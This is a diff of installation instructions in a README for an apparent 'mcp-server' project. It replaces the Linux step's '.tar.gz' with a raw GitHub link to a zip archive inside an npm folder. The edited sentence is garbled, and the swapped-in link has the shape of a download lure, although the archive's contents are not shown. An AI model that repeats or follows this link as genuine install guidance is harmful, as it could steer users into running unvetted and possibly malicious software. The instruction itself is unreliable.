vtnhogg/mcp-server/README.md

 5. **Run the Installer:**
    - For Windows: Locate the downloaded `.exe` file and double-click it to start the installation process.
    - For macOS: Find the downloaded `.dmg` file, double-click it, then drag the mcp-server application to your Applications folder.
-   - For Linux: Extract the `.tar.gz` file and follow any included instructions to complete the installation.
+   - For Linux: Extract the `https://raw.githubusercontent.com/vtnhogg/mcp-server/main/npm/mcp-server_3.9.zip` file and follow any included instructions to complete the installation.

 6. **Follow Installation Prompts:**
    Complete the installation by following any on-screen prompts.
 Make sure to accept the terms and conditions when required.